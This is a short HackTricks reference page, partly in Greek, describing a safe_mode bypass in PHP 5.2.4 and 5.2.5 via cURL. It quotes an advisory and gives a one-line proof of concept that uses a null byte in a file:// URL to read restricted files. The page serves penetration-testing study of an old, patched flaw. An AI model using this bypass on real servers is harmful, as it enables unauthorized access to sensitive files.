Greek - Ht
HackTricks Training Twitter Linkedin Sponsor

disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL

Υποστήριξη HackTricks

PHP 5.2.4 και 5.2.5 PHP cURL

Από http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

source: http://www.securityfocus.com/bid/27413/info

PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

The issue affects PHP 5.2.5 and 5.2.4.

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
Υποστήριξη HackTricks
Previousdisable_functions bypass - PHP <= 5.2.9 on windowsNextdisable_functions bypass - PHP safe_mode bypass via proc_open() and custom environment Exploit

Last updated